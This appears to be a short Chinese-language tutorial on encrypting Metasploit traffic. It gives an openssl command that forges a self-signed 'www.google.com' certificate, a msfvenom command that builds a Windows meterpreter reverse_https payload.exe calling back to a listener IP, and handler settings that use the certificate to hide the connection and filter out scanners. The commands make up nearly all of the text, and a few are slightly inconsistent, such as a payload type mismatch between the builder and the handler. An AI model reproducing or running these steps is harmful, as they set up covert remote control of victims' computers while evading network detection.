msf流量加密
生成证书
1
2
3
4
5
6openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj /C=UK/ST=London/L=London/O=Development/CN=www.google.com \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt生成payload
1
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.199.156 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=server.pem PayloadUUIDName=qqy -f exe -o payload.exe
PayloadUUIDTracking生成的payload回连时会携带一个uuid序号设置监听
1
2
3
4
5
6
7use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.6.18.56
set lport 4321
set handlersslcert /root/kalifile/server.pem(生成的pem证书)
set stagerverifysslcert true (可以分辨是nmap在连接还是有真正的shell在回连)
run -j
